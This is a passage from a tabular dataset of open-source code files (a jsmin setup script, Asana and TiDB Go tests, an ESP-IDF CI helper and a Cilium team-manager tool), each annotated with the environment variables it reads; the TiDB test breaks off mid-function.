filename (string, 4-198 chars) | content (string, 25-939k chars) | environment (list) | variablearg (list) | constarg (list) | variableargjson (string, 1 class) | constargjson (string, 2-3.9k chars) | lang (string, 3 classes) | constargcount (float64, 0-129, nullable) | variableargcount (float64, 0, nullable) | sentence (string, 1 class) |
---|---|---|---|---|---|---|---|---|---|---|
setup.py
|
from setuptools import setup
import os, sys, re
os.environ['COPYFILE_DISABLE'] = 'true' # this disables including resource forks in tar files on os x
def long_description():
return open('README.rst').read() + '\n' + open('CHANGELOG.txt').read()
setup(
name="jsmin",
version=re.search(r'__version__ = ["\']([^"\']+)', open('jsmin/__init__.py').read()).group(1),
packages=['jsmin'],
description='JavaScript minifier.',
long_description=long_description(),
author='Dave St.Germain',
author_email='[email protected]',
maintainer='Tikitu de Jager',
maintainer_email='[email protected]',
test_suite='jsmin.test',
license='MIT License',
url='https://github.com/tikitu/jsmin/',
classifiers=[
'Development Status :: 5 - Production/Stable',
'Environment :: Web Environment',
'Intended Audience :: Developers',
'License :: OSI Approved :: MIT License',
'Operating System :: OS Independent',
'Programming Language :: Python :: 3 :: Only',
'Topic :: Internet :: WWW/HTTP :: Dynamic Content',
'Topic :: Software Development :: Pre-processors',
'Topic :: Text Processing :: Filters',
]
)
| [] | [] | ["COPYFILE_DISABLE"] | [] | ["COPYFILE_DISABLE"] | python | 1 | 0 | |
asana_test.go
|
// +build integration
package main
import (
"os"
"testing"
"code.google.com/p/goauth2/oauth"
)
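// resetAsanaLimit restores asanaPerPageLimit to 100 after tests that temporarily lower it to exercise pagination.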
func resetAsanaLimit() {
asanaPerPageLimit = 100
}
func createAsanaService() Service {
s := &AsanaService{}
token := oauth.Token{
AccessToken: os.Getenv("ASANA_PERSONAL_TOKEN"),
}
s.token = token
s.AsanaParams = &AsanaParams{
AccountID: numberStrToInt64(os.Getenv("ASANA_ACCOUNT_ID")),
}
return s
}
func TestAsanaAccounts(t *testing.T) {
s := createAsanaService()
accounts, err := s.Accounts()
if err != nil {
t.Error("error calling accounts(), err:", err)
}
if len(accounts) != 1 {
t.Error("should get 1 account returned")
}
if accounts[0].ID != numberStrToInt64(os.Getenv("ASANA_ACCOUNT_ID")) {
t.Error("got wrong account id")
}
}
func TestAsanaUsers(t *testing.T) {
s := createAsanaService()
users, err := s.Users()
if err != nil {
t.Error("error calling users(), err:", err)
}
if len(users) == 0 {
t.Error("should get some users")
}
}
func TestAsanaProjects(t *testing.T) {
defer resetAsanaLimit()
asanaPerPageLimit = 10
s := createAsanaService()
projects, err := s.Projects()
if err != nil {
t.Error("error calling projects(), err:", err)
}
if len(projects) <= 10 {
t.Error("should get more than 10 project, please create at least 11 project to test pagination")
}
}
func TestAsanaTask(t *testing.T) {
defer resetAsanaLimit()
asanaPerPageLimit = 10
s := createAsanaService()
tasks, err := s.Tasks()
if err != nil {
t.Error("error calling tasks(), err: ", err)
}
if len(tasks) <= 10 {
t.Error("should get more than 10 tasks, please create at least 11 tasks and assign them to a project to test pagination")
}
}
| ["\"ASANA_PERSONAL_TOKEN\"", "\"ASANA_ACCOUNT_ID\"", "\"ASANA_ACCOUNT_ID\""] | [] | ["ASANA_PERSONAL_TOKEN", "ASANA_ACCOUNT_ID"] | [] | ["ASANA_PERSONAL_TOKEN", "ASANA_ACCOUNT_ID"] | go | 2 | 0 | |
tools/ci/python_packages/ttfw_idf/__init__.py
|
# Copyright 2015-2017 Espressif Systems (Shanghai) PTE LTD
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import functools
import json
import logging
import os
import re
from copy import deepcopy
import junit_xml
from tiny_test_fw import TinyFW, Utility
from .DebugUtils import OCDBackend, GDBBackend, CustomProcess # noqa: export DebugUtils for users
from .IDFApp import IDFApp, Example, LoadableElfTestApp, UT, TestApp, ComponentUTApp # noqa: export all Apps for users
from .IDFDUT import IDFDUT, ESP32DUT, ESP32S2DUT, ESP8266DUT, ESP32QEMUDUT # noqa: export DUTs for users
from .unity_test_parser import TestResults, TestFormat
# pass TARGET_DUT_CLS_DICT to Env.py to avoid circular dependency issue.
TARGET_DUT_CLS_DICT = {
'ESP32': ESP32DUT,
'ESP32S2': ESP32S2DUT,
}
def format_case_id(target, case_name):
return "{}.{}".format(target, case_name)
try:
string_type = basestring
except NameError:
string_type = str
def upper_list_or_str(text):
"""
Return the uppercase version of a string (wrapped in a list) or of each item in a list of
strings. Other data types are returned unchanged.
:param text: list or string; other instances are returned immediately
:return: list of uppercase strings
"""
if isinstance(text, string_type):
return [text.upper()]
elif isinstance(text, list):
return [item.upper() for item in text]
else:
return text
def local_test_check(decorator_target):
# Try to get the sdkconfig.json to read the IDF_TARGET value.
# If not set, will set to ESP32.
# For CI jobs, this is a fake procedure, the true target and dut will be
# overwritten by the job config YAML file.
idf_target = 'ESP32' # default if sdkconfig not found or not readable
if os.getenv('CI_JOB_ID'): # Only auto-detect target when running locally
return idf_target
decorator_target = upper_list_or_str(decorator_target)
expected_json_path = os.path.join('build', 'config', 'sdkconfig.json')
if os.path.exists(expected_json_path):
sdkconfig = json.load(open(expected_json_path))
try:
idf_target = sdkconfig['IDF_TARGET'].upper()
except KeyError:
logging.debug('IDF_TARGET not in {}. IDF_TARGET set to esp32'.format(os.path.abspath(expected_json_path)))
else:
logging.debug('IDF_TARGET: {}'.format(idf_target))
else:
logging.debug('{} not found. IDF_TARGET set to esp32'.format(os.path.abspath(expected_json_path)))
if isinstance(decorator_target, list):
if idf_target not in decorator_target:
raise ValueError('IDF_TARGET set to {}, not in decorator target value'.format(idf_target))
else:
if idf_target != decorator_target:
raise ValueError('IDF_TARGET set to {}, not equal to decorator target value'.format(idf_target))
return idf_target
def get_dut_class(target, dut_class_dict, erase_nvs=None):
if target not in dut_class_dict:
raise Exception('target can only be {%s} (case insensitive)' % ', '.join(dut_class_dict.keys()))
dut = dut_class_dict[target.upper()]
if erase_nvs:
dut.ERASE_NVS = 'erase_nvs'
return dut
def ci_target_check(func):
@functools.wraps(func)
def wrapper(**kwargs):
target = upper_list_or_str(kwargs.get('target', []))
ci_target = upper_list_or_str(kwargs.get('ci_target', []))
if not set(ci_target).issubset(set(target)):
raise ValueError('ci_target must be a subset of target')
return func(**kwargs)
return wrapper
def test_func_generator(func, app, target, ci_target, module, execution_time, level, erase_nvs, **kwargs):
target = upper_list_or_str(target)
test_target = local_test_check(target)
if 'additional_duts' in kwargs:
dut_classes = deepcopy(TARGET_DUT_CLS_DICT)
dut_classes.update(kwargs['additional_duts'])
else:
dut_classes = TARGET_DUT_CLS_DICT
dut = get_dut_class(test_target, dut_classes, erase_nvs)
original_method = TinyFW.test_method(
app=app, dut=dut, target=target, ci_target=upper_list_or_str(ci_target),
module=module, execution_time=execution_time, level=level, erase_nvs=erase_nvs,
dut_dict=dut_classes, **kwargs
)
test_func = original_method(func)
test_func.case_info["ID"] = format_case_id(target, test_func.case_info["name"])
return test_func
@ci_target_check
def idf_example_test(app=Example, target="ESP32", ci_target=None, module="examples", execution_time=1,
level="example", erase_nvs=True, config_name=None, **kwargs):
"""
decorator for testing idf examples (with default values for some keyword args).
:param app: test application class
:param target: target supported, string or list
:param ci_target: target auto run in CI, if None then all targets will be tested, None, string or list
:param module: module, string
:param execution_time: execution time in minutes, int
:param level: test level, could be used to filter test cases, string
:param erase_nvs: if need to erase_nvs in DUT.start_app()
:param config_name: if specified, name of the app configuration
:param kwargs: other keyword args
:return: test method
"""
def test(func):
return test_func_generator(func, app, target, ci_target, module, execution_time, level, erase_nvs, **kwargs)
return test
@ci_target_check
def idf_unit_test(app=UT, target="ESP32", ci_target=None, module="unit-test", execution_time=1,
level="unit", erase_nvs=True, **kwargs):
"""
decorator for testing idf unit tests (with default values for some keyword args).
:param app: test application class
:param target: target supported, string or list
:param ci_target: target auto run in CI, if None then all targets will be tested, None, string or list
:param module: module, string
:param execution_time: execution time in minutes, int
:param level: test level, could be used to filter test cases, string
:param erase_nvs: if need to erase_nvs in DUT.start_app()
:param kwargs: other keyword args
:return: test method
"""
def test(func):
return test_func_generator(func, app, target, ci_target, module, execution_time, level, erase_nvs, **kwargs)
return test
@ci_target_check
def idf_custom_test(app=TestApp, target="ESP32", ci_target=None, module="misc", execution_time=1,
level="integration", erase_nvs=True, config_name=None, **kwargs):
"""
decorator for idf custom tests (with default values for some keyword args).
:param app: test application class
:param target: target supported, string or list
:param ci_target: target auto run in CI, if None then all targets will be tested, None, string or list
:param module: module, string
:param execution_time: execution time in minutes, int
:param level: test level, could be used to filter test cases, string
:param erase_nvs: if need to erase_nvs in DUT.start_app()
:param config_name: if specified, name of the app configuration
:param kwargs: other keyword args
:return: test method
"""
def test(func):
return test_func_generator(func, app, target, ci_target, module, execution_time, level, erase_nvs, **kwargs)
return test
@ci_target_check
def idf_component_unit_test(app=ComponentUTApp, target="ESP32", ci_target=None, module="misc", execution_time=1,
level="integration", erase_nvs=True, config_name=None, **kwargs):
"""
decorator for idf custom tests (with default values for some keyword args).
:param app: test application class
:param target: target supported, string or list
:param ci_target: target auto run in CI, if None then all targets will be tested, None, string or list
:param module: module, string
:param execution_time: execution time in minutes, int
:param level: test level, could be used to filter test cases, string
:param erase_nvs: if need to erase_nvs in DUT.start_app()
:param config_name: if specified, name of the app configuration
:param kwargs: other keyword args
:return: test method
"""
def test(func):
return test_func_generator(func, app, target, ci_target, module, execution_time, level, erase_nvs, **kwargs)
return test
class ComponentUTResult:
"""
Function Class, parse component unit test results
"""
@staticmethod
def parse_result(stdout):
try:
results = TestResults(stdout, TestFormat.UNITY_FIXTURE_VERBOSE)
except (ValueError, TypeError) as e:
raise ValueError('Error occurs when parsing the component unit test stdout to JUnit report: ' + str(e))
group_name = results.tests()[0].group()
with open(os.path.join(os.getenv('LOG_PATH', ''), '{}_XUNIT_RESULT.xml'.format(group_name)), 'w') as fw:
junit_xml.to_xml_report_file(fw, [results.to_junit()])
if results.num_failed():
# raise exception if any case fails
err_msg = 'Failed Cases:\n'
for test_case in results.test_iter():
if test_case.result() == 'FAIL':
err_msg += '\t{}: {}'.format(test_case.name(), test_case.message())
raise AssertionError(err_msg)
def log_performance(item, value):
"""
Print a performance item to the console using the pre-defined format.
:param item: performance item name
:param value: performance value
"""
performance_msg = "[Performance][{}]: {}".format(item, value)
Utility.console_log(performance_msg, "orange")
# update to junit test report
current_junit_case = TinyFW.JunitReport.get_current_test_case()
current_junit_case.stdout += performance_msg + "\r\n"
def check_performance(item, value, target):
"""
check if idf performance meet pass standard
:param item: performance item name
:param value: performance item value
:param target: target chip
:raise: AssertionError: if check fails
"""
def _find_perf_item(path):
with open(path, 'r') as f:
data = f.read()
match = re.search(r'#define\s+IDF_PERFORMANCE_(MIN|MAX)_{}\s+([\d.]+)'.format(item.upper()), data)
return match.group(1), float(match.group(2))
def _check_perf(op, standard_value):
if op == 'MAX':
ret = value <= standard_value
else:
ret = value >= standard_value
if not ret:
raise AssertionError("[Performance] {} value is {}, doesn't meet pass standard {}"
.format(item, value, standard_value))
path_prefix = os.path.join(IDFApp.get_sdk_path(), 'components', 'idf_test', 'include')
performance_files = (os.path.join(path_prefix, target, 'idf_performance_target.h'),
os.path.join(path_prefix, 'idf_performance.h'))
for performance_file in performance_files:
try:
op, standard = _find_perf_item(performance_file)
except (IOError, AttributeError):
# performance file doesn't exist or match is not found in it
continue
_check_perf(op, standard)
# if no exception was thrown then the performance is met and no need to continue
break
else:
raise AssertionError("Failed to get performance standard for {}".format(item))
MINIMUM_FREE_HEAP_SIZE_RE = re.compile(r'Minimum free heap size: (\d+) bytes')
def print_heap_size(app_name, config_name, target, minimum_free_heap_size):
"""
Do not change the print output unless you really need to.
The result is parsed by ci-dashboard project
"""
print('------ heap size info ------\n'
'[app_name] {}\n'
'[config_name] {}\n'
'[target] {}\n'
'[minimum_free_heap_size] {} Bytes\n'
'------ heap size end ------'.format(app_name,
'' if not config_name else config_name,
target,
minimum_free_heap_size))
| [] | [] | ["LOG_PATH", "CI_JOB_ID"] | [] | ["LOG_PATH", "CI_JOB_ID"] | python | 2 | 0 | |
cmd/main.go
|
// Copyright 2021 Authors of Cilium
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
package main
import (
"context"
"errors"
"fmt"
"os"
"os/signal"
"github.com/cilium/team-manager/pkg/config"
"github.com/cilium/team-manager/pkg/github"
"github.com/cilium/team-manager/pkg/persistence"
"github.com/cilium/team-manager/pkg/team"
flag "github.com/spf13/pflag"
)
var (
orgName string
configFilename string
force bool
)
func init() {
flag.StringVar(&orgName, "org", "cilium", "GitHub organization name")
flag.StringVar(&configFilename, "config-filename", "team-assignments.yaml", "Path of the local team-assignments configuration file")
flag.BoolVar(&force, "force", false, "Force local changes into GitHub without asking for confirmation")
flag.Parse()
go signals()
}
var globalCtx, cancel = context.WithCancel(context.Background())
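// signals cancels the global context when the process receives an interrupt signal.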
func signals() {
signalCh := make(chan os.Signal, 1)
signal.Notify(signalCh, os.Interrupt)
<-signalCh
cancel()
}
func main() {
ghClient := github.NewClient(os.Getenv("GITHUB_TOKEN"))
ghGraphQLClient := github.NewClientGraphQL(os.Getenv("GITHUB_TOKEN"))
tm := team.NewManager(ghClient, ghGraphQLClient, orgName)
var newConfig *config.Config
localCfg, err := persistence.LoadState(configFilename)
if errors.Is(err, os.ErrNotExist) {
fmt.Printf("Configuration file %q not found, retriving configuration from organization...\n", configFilename)
newConfig, err = tm.GetCurrentConfig(globalCtx)
if err != nil {
panic(err)
}
fmt.Printf("Done, change your local configuration and re-run me again.\n")
} else if err != nil {
panic(err)
} else {
newConfig, err = tm.SyncTeams(globalCtx, localCfg, force)
if err != nil {
panic(err)
}
}
config.SortConfig(newConfig)
err = persistence.StoreState(configFilename, newConfig)
if err != nil {
panic(err)
}
}
| ["\"GITHUB_TOKEN\"", "\"GITHUB_TOKEN\""] | [] | ["GITHUB_TOKEN"] | [] | ["GITHUB_TOKEN"] | go | 1 | 0 | |
server/http_handler_test.go
|
// Copyright 2018 PingCAP, Inc.
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
package server
import (
"bytes"
"crypto/tls"
"crypto/x509"
"crypto/x509/pkix"
"database/sql"
"encoding/base64"
"encoding/json"
"fmt"
"io"
"io/ioutil"
"net/http"
"net/http/httputil"
"net/url"
"os"
"sort"
"strings"
"sync/atomic"
"time"
. "github.com/pingcap/check"
"github.com/pingcap/failpoint"
zaplog "github.com/pingcap/log"
"github.com/pingcap/parser/model"
"github.com/pingcap/parser/mysql"
"github.com/pingcap/tidb/config"
"github.com/pingcap/tidb/ddl"
"github.com/pingcap/tidb/domain"
"github.com/pingcap/tidb/kv"
"github.com/pingcap/tidb/meta"
"github.com/pingcap/tidb/session"
"github.com/pingcap/tidb/sessionctx"
"github.com/pingcap/tidb/sessionctx/binloginfo"
"github.com/pingcap/tidb/sessionctx/stmtctx"
"github.com/pingcap/tidb/sessionctx/variable"
"github.com/pingcap/tidb/store/helper"
"github.com/pingcap/tidb/store/mockstore"
"github.com/pingcap/tidb/store/mockstore/mocktikv"
"github.com/pingcap/tidb/store/tikv"
"github.com/pingcap/tidb/tablecodec"
"github.com/pingcap/tidb/types"
"github.com/pingcap/tidb/util/codec"
"github.com/pingcap/tidb/util/printer"
"github.com/pingcap/tidb/util/rowcodec"
log "github.com/sirupsen/logrus"
"go.uber.org/zap"
)
type HTTPHandlerTestSuite struct {
*testServerClient
server *Server
store kv.Storage
domain *domain.Domain
tidbdrv *TiDBDriver
}
var _ = Suite(&HTTPHandlerTestSuite{
testServerClient: newTestServerClient(),
})
func (ts *HTTPHandlerTestSuite) TestRegionIndexRange(c *C) {
sTableID := int64(3)
sIndex := int64(11)
eTableID := int64(9)
recordID := int64(133)
indexValues := []types.Datum{
types.NewIntDatum(100),
types.NewBytesDatum([]byte("foobar")),
types.NewFloat64Datum(-100.25),
}
expectIndexValues := make([]string, 0, len(indexValues))
for _, v := range indexValues {
str, err := v.ToString()
if err != nil {
str = fmt.Sprintf("%d-%v", v.Kind(), v.GetValue())
}
expectIndexValues = append(expectIndexValues, str)
}
encodedValue, err := codec.EncodeKey(&stmtctx.StatementContext{TimeZone: time.Local}, nil, indexValues...)
c.Assert(err, IsNil)
startKey := tablecodec.EncodeIndexSeekKey(sTableID, sIndex, encodedValue)
recordPrefix := tablecodec.GenTableRecordPrefix(eTableID)
endKey := tablecodec.EncodeRecordKey(recordPrefix, recordID)
region := &tikv.KeyLocation{
Region: tikv.RegionVerID{},
StartKey: startKey,
EndKey: endKey,
}
r, err := helper.NewRegionFrameRange(region)
c.Assert(err, IsNil)
c.Assert(r.First.IndexID, Equals, sIndex)
c.Assert(r.First.IsRecord, IsFalse)
c.Assert(r.First.RecordID, Equals, int64(0))
c.Assert(r.First.IndexValues, DeepEquals, expectIndexValues)
c.Assert(r.Last.RecordID, Equals, recordID)
c.Assert(r.Last.IndexValues, IsNil)
testCases := []struct {
tableID int64
indexID int64
isCover bool
}{
{2, 0, false},
{3, 0, true},
{9, 0, true},
{10, 0, false},
{2, 10, false},
{3, 10, false},
{3, 11, true},
{3, 20, true},
{9, 10, true},
{10, 1, false},
}
for _, t := range testCases {
var f *helper.FrameItem
if t.indexID == 0 {
f = r.GetRecordFrame(t.tableID, "", "")
} else {
f = r.GetIndexFrame(t.tableID, t.indexID, "", "", "")
}
if t.isCover {
c.Assert(f, NotNil)
} else {
c.Assert(f, IsNil)
}
}
}
func (ts *HTTPHandlerTestSuite) TestRegionIndexRangeWithEndNoLimit(c *C) {
sTableID := int64(15)
startKey := tablecodec.GenTableRecordPrefix(sTableID)
endKey := []byte("z_aaaaafdfd")
region := &tikv.KeyLocation{
Region: tikv.RegionVerID{},
StartKey: startKey,
EndKey: endKey,
}
r, err := helper.NewRegionFrameRange(region)
c.Assert(err, IsNil)
c.Assert(r.First.IsRecord, IsTrue)
c.Assert(r.Last.IsRecord, IsTrue)
c.Assert(r.GetRecordFrame(300, "", ""), NotNil)
c.Assert(r.GetIndexFrame(200, 100, "", "", ""), NotNil)
}
func (ts *HTTPHandlerTestSuite) TestRegionIndexRangeWithStartNoLimit(c *C) {
eTableID := int64(9)
startKey := []byte("m_aaaaafdfd")
endKey := tablecodec.GenTableRecordPrefix(eTableID)
region := &tikv.KeyLocation{
Region: tikv.RegionVerID{},
StartKey: startKey,
EndKey: endKey,
}
r, err := helper.NewRegionFrameRange(region)
c.Assert(err, IsNil)
c.Assert(r.First.IsRecord, IsFalse)
c.Assert(r.Last.IsRecord, IsTrue)
c.Assert(r.GetRecordFrame(3, "", ""), NotNil)
c.Assert(r.GetIndexFrame(8, 1, "", "", ""), NotNil)
}
func (ts *HTTPHandlerTestSuite) TestRegionsAPI(c *C) {
ts.startServer(c)
defer ts.stopServer(c)
resp, err := ts.fetchStatus("/tables/information_schema/SCHEMATA/regions")
c.Assert(err, IsNil)
c.Assert(resp.StatusCode, Equals, http.StatusOK)
defer resp.Body.Close()
decoder := json.NewDecoder(resp.Body)
var data TableRegions
err = decoder.Decode(&data)
c.Assert(err, IsNil)
c.Assert(len(data.RecordRegions) > 0, IsTrue)
// list region
for _, region := range data.RecordRegions {
c.Assert(ts.regionContainsTable(c, region.ID, data.TableID), IsTrue)
}
}
func (ts *HTTPHandlerTestSuite) regionContainsTable(c *C, regionID uint64, tableID int64) bool {
resp, err := ts.fetchStatus(fmt.Sprintf("/regions/%d", regionID))
c.Assert(err, IsNil)
c.Assert(resp.StatusCode, Equals, http.StatusOK)
defer resp.Body.Close()
decoder := json.NewDecoder(resp.Body)
var data RegionDetail
err = decoder.Decode(&data)
c.Assert(err, IsNil)
for _, index := range data.Frames {
if index.TableID == tableID {
return true
}
}
return false
}
func (ts *HTTPHandlerTestSuite) TestListTableRegions(c *C) {
ts.startServer(c)
defer ts.stopServer(c)
ts.prepareData(c)
// Test list table regions with error
resp, err := ts.fetchStatus("/tables/fdsfds/aaa/regions")
c.Assert(err, IsNil)
defer resp.Body.Close()
c.Assert(resp.StatusCode, Equals, http.StatusBadRequest)
resp, err = ts.fetchStatus("/tables/tidb/pt/regions")
c.Assert(err, IsNil)
defer resp.Body.Close()
var data []*TableRegions
dec := json.NewDecoder(resp.Body)
err = dec.Decode(&data)
c.Assert(err, IsNil)
region := data[1]
_, err = ts.fetchStatus(fmt.Sprintf("/regions/%d", region.TableID))
c.Assert(err, IsNil)
}
func (ts *HTTPHandlerTestSuite) TestGetRegionByIDWithError(c *C) {
ts.startServer(c)
defer ts.stopServer(c)
resp, err := ts.fetchStatus("/regions/xxx")
c.Assert(err, IsNil)
c.Assert(resp.StatusCode, Equals, http.StatusBadRequest)
defer resp.Body.Close()
}
func (ts *HTTPHandlerTestSuite) TestBinlogRecover(c *C) {
ts.startServer(c)
defer ts.stopServer(c)
binloginfo.EnableSkipBinlogFlag()
c.Assert(binloginfo.IsBinlogSkipped(), Equals, true)
resp, err := ts.fetchStatus("/binlog/recover")
c.Assert(err, IsNil)
defer resp.Body.Close()
c.Assert(resp.StatusCode, Equals, http.StatusOK)
c.Assert(binloginfo.IsBinlogSkipped(), Equals, false)
// Invalid operation will use the default operation.
binloginfo.EnableSkipBinlogFlag()
c.Assert(binloginfo.IsBinlogSkipped(), Equals, true)
resp, err = ts.fetchStatus("/binlog/recover?op=abc")
c.Assert(err, IsNil)
defer resp.Body.Close()
c.Assert(resp.StatusCode, Equals, http.StatusOK)
c.Assert(binloginfo.IsBinlogSkipped(), Equals, false)
binloginfo.EnableSkipBinlogFlag()
c.Assert(binloginfo.IsBinlogSkipped(), Equals, true)
resp, err = ts.fetchStatus("/binlog/recover?op=abc&seconds=1")
c.Assert(err, IsNil)
defer resp.Body.Close()
c.Assert(resp.StatusCode, Equals, http.StatusOK)
c.Assert(binloginfo.IsBinlogSkipped(), Equals, false)
binloginfo.EnableSkipBinlogFlag()
c.Assert(binloginfo.IsBinlogSkipped(), Equals, true)
binloginfo.AddOneSkippedCommitter()
resp, err = ts.fetchStatus("/binlog/recover?op=abc&seconds=1")
c.Assert(err, IsNil)
defer resp.Body.Close()
c.Assert(resp.StatusCode, Equals, http.StatusBadRequest)
c.Assert(binloginfo.IsBinlogSkipped(), Equals, false)
binloginfo.RemoveOneSkippedCommitter()
binloginfo.AddOneSkippedCommitter()
c.Assert(binloginfo.SkippedCommitterCount(), Equals, int32(1))
resp, err = ts.fetchStatus("/binlog/recover?op=reset")
c.Assert(err, IsNil)
defer resp.Body.Close()
c.Assert(resp.StatusCode, Equals, http.StatusOK)
c.Assert(binloginfo.SkippedCommitterCount(), Equals, int32(0))
binloginfo.EnableSkipBinlogFlag()
resp, err = ts.fetchStatus("/binlog/recover?op=nowait")
c.Assert(err, IsNil)
defer resp.Body.Close()
c.Assert(resp.StatusCode, Equals, http.StatusOK)
c.Assert(binloginfo.IsBinlogSkipped(), Equals, false)
// Only the first should work.
binloginfo.EnableSkipBinlogFlag()
resp, err = ts.fetchStatus("/binlog/recover?op=nowait&op=reset")
c.Assert(err, IsNil)
defer resp.Body.Close()
c.Assert(resp.StatusCode, Equals, http.StatusOK)
c.Assert(binloginfo.IsBinlogSkipped(), Equals, false)
resp, err = ts.fetchStatus("/binlog/recover?op=status")
c.Assert(err, IsNil)
defer resp.Body.Close()
c.Assert(resp.StatusCode, Equals, http.StatusOK)
}
func (ts *HTTPHandlerTestSuite) TestRegionsFromMeta(c *C) {
ts.startServer(c)
defer ts.stopServer(c)
resp, err := ts.fetchStatus("/regions/meta")
c.Assert(err, IsNil)
defer resp.Body.Close()
c.Assert(resp.StatusCode, Equals, http.StatusOK)
// Verify the resp body.
decoder := json.NewDecoder(resp.Body)
metas := make([]RegionMeta, 0)
err = decoder.Decode(&metas)
c.Assert(err, IsNil)
for _, meta := range metas {
c.Assert(meta.ID != 0, IsTrue)
}
// test no panic
c.Assert(failpoint.Enable("github.com/pingcap/tidb/server/errGetRegionByIDEmpty", `return(true)`), IsNil)
resp1, err := ts.fetchStatus("/regions/meta")
c.Assert(err, IsNil)
defer resp1.Body.Close()
c.Assert(failpoint.Disable("github.com/pingcap/tidb/server/errGetRegionByIDEmpty"), IsNil)
}
func (ts *HTTPHandlerTestSuite) startServer(c *C) {
mvccStore := mocktikv.MustNewMVCCStore()
var err error
ts.store, err = mockstore.NewMockTikvStore(mockstore.WithMVCCStore(mvccStore))
c.Assert(err, IsNil)
ts.domain, err = session.BootstrapSession(ts.store)
c.Assert(err, IsNil)
ts.tidbdrv = NewTiDBDriver(ts.store)
cfg := config.NewConfig()
cfg.Port = ts.port
cfg.Store = "tikv"
cfg.Status.StatusPort = ts.statusPort
cfg.Status.ReportStatus = true
server, err := NewServer(cfg, ts.tidbdrv)
c.Assert(err, IsNil)
ts.server = server
go server.Run()
ts.waitUntilServerOnline()
}
func (ts *HTTPHandlerTestSuite) stopServer(c *C) {
if ts.domain != nil {
ts.domain.Close()
}
if ts.store != nil {
ts.store.Close()
}
if ts.server != nil {
ts.server.Close()
}
}
func (ts *HTTPHandlerTestSuite) prepareData(c *C) {
db, err := sql.Open("mysql", ts.getDSN())
c.Assert(err, IsNil, Commentf("Error connecting"))
defer db.Close()
dbt := &DBTest{c, db}
dbt.mustExec("create database tidb;")
dbt.mustExec("use tidb;")
dbt.mustExec("create table tidb.test (a int auto_increment primary key, b varchar(20));")
dbt.mustExec("insert tidb.test values (1, 1);")
txn1, err := dbt.db.Begin()
c.Assert(err, IsNil)
_, err = txn1.Exec("update tidb.test set b = b + 1 where a = 1;")
c.Assert(err, IsNil)
_, err = txn1.Exec("insert tidb.test values (2, 2);")
c.Assert(err, IsNil)
_, err = txn1.Exec("insert tidb.test (a) values (3);")
c.Assert(err, IsNil)
_, err = txn1.Exec("insert tidb.test values (4, '');")
c.Assert(err, IsNil)
err = txn1.Commit()
c.Assert(err, IsNil)
dbt.mustExec("alter table tidb.test add index idx1 (a, b);")
dbt.mustExec("alter table tidb.test add unique index idx2 (a, b);")
dbt.mustExec(`create table tidb.pt (a int primary key, b varchar(20), key idx(a, b))
partition by range (a)
(partition p0 values less than (256),
partition p1 values less than (512),
partition p2 values less than (1024))`)
txn2, err := dbt.db.Begin()
c.Assert(err, IsNil)
txn2.Exec("insert into tidb.pt values (42, '123')")
txn2.Exec("insert into tidb.pt values (256, 'b')")
txn2.Exec("insert into tidb.pt values (666, 'def')")
err = txn2.Commit()
c.Assert(err, IsNil)
}
func decodeKeyMvcc(closer io.ReadCloser, c *C, valid bool) {
decoder := json.NewDecoder(closer)
var data mvccKV
err := decoder.Decode(&data)
c.Assert(err, IsNil)
if valid {
c.Assert(data.Value.Info, NotNil)
c.Assert(len(data.Value.Info.Writes), Greater, 0)
} else {
c.Assert(data.Value.Info.Lock, IsNil)
c.Assert(data.Value.Info.Writes, IsNil)
c.Assert(data.Value.Info.Values, IsNil)
}
}
func (ts *HTTPHandlerTestSuite) TestGetTableMVCC(c *C) {
ts.startServer(c)
ts.prepareData(c)
defer ts.stopServer(c)
resp, err := ts.fetchStatus(fmt.Sprintf("/mvcc/key/tidb/test/1"))
c.Assert(err, IsNil)
decoder := json.NewDecoder(resp.Body)
var data mvccKV
err = decoder.Decode(&data)
c.Assert(err, IsNil)
c.Assert(data.Value, NotNil)
info := data.Value.Info
c.Assert(info, NotNil)
c.Assert(len(info.Writes), Greater, 0)
startTs := info.Writes[2].StartTs
resp, err = ts.fetchStatus(fmt.Sprintf("/mvcc/txn/%d/tidb/test", startTs))
c.Assert(err, IsNil)
var p2 mvccKV
decoder = json.NewDecoder(resp.Body)
err = decoder.Decode(&p2)
c.Assert(err, IsNil)
for i, expect := range info.Values {
v2 := p2.Value.Info.Values[i].Value
c.Assert(v2, BytesEquals, expect.Value)
}
hexKey := p2.Key
resp, err = ts.fetchStatus("/mvcc/hex/" + hexKey)
c.Assert(err, IsNil)
decoder = json.NewDecoder(resp.Body)
var data2 mvccKV
err = decoder.Decode(&data2)
c.Assert(err, IsNil)
c.Assert(data2, DeepEquals, data)
resp, err = ts.fetchStatus(fmt.Sprintf("/mvcc/key/tidb/test/1?decode=true"))
c.Assert(err, IsNil)
decoder = json.NewDecoder(resp.Body)
var data3 map[string]interface{}
err = decoder.Decode(&data3)
c.Assert(err, IsNil)
c.Assert(data3["key"], NotNil)
c.Assert(data3["info"], NotNil)
c.Assert(data3["data"], NotNil)
c.Assert(data3["decode_error"], IsNil)
resp, err = ts.fetchStatus("/mvcc/key/tidb/pt(p0)/42?decode=true")
c.Assert(err, IsNil)
defer resp.Body.Close()
decoder = json.NewDecoder(resp.Body)
var data4 map[string]interface{}
err = decoder.Decode(&data4)
c.Assert(err, IsNil)
c.Assert(data4["key"], NotNil)
c.Assert(data4["info"], NotNil)
c.Assert(data4["data"], NotNil)
c.Assert(data4["decode_error"], IsNil)
}
func (ts *HTTPHandlerTestSuite) TestGetMVCCNotFound(c *C) {
ts.startServer(c)
